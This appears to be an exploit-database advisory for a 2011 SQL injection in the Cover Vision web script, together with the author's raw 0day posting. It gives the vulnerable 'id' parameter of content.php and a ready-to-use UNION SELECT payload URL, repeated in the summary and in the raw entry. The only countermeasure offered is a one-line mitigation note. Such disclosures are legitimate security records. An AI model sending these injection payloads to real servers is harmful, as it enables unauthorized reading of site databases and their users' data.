Cover Vision [ Sql Injection Vulnerability]

vendor:

Cover Vision

by:

Egyptian.H4x0rz

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Cover Vision

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Cover Vision [ Sql Injection Vulnerability]

A SQL injection vulnerability exists in Cover Vision, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'content.php' script. An example of exploiting this vulnerability is by sending a crafted HTTP request containing a malicious SQL statement to the vulnerable server, such as 'http://server/content.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13'.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

####################################################################
[+] Exploit Title : Cover Vision  [ Sql Injection Vulnerability]
[+] Author : Egyptian.H4x0rz
[+] Contact : SpY(at)Hotmail.Com
[+] Date : 13-03-2011
[+] Software Link: http://unikscripts.com/yaxal_products.php?display=product&id=66
[+] category: Web Apps [SQli]
[+] HomePage : www.Black-hat.cc
####################################################################

Vulnerability:
   
*SQL injection Vulnerability*
  
[#] http://patch/content.php?id=1+union+select+1,2,3,4,[sqli],6,7,8,9,10,11,12,13
 
[#] eXample
http://server/content.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13
   
####################################################################
#End 0Day                                                                                                                                       #
####################################################################